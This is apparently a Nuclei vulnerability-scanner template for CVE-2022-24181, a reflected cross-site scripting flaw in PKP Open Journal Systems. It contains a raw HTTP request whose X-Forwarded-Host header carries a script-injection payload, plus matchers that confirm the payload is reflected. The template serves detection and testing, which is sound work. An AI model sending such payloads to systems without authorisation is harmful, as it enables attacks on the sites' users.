nuclei-templates/cves/2022/CVE-2022-24181.yaml

47 lines
1.2 KiB
YAML

id: CVE-2022-24181
info:
name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting
author: lucasljm2001,ekrause
severity: medium
description: |
PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.
reference:
- https://www.exploit-db.com/exploits/50881
- https://github.com/pkp/pkp-lib/issues/7649
- https://youtu.be/v8-9evO2oVg
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24181
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,oss,pkp-lib,edb
requests:
- raw:
- |
GET /iupjournals/index.php/esj HTTP/2
Host: {{Hostname}}
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script><x=".com/iupjournals'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14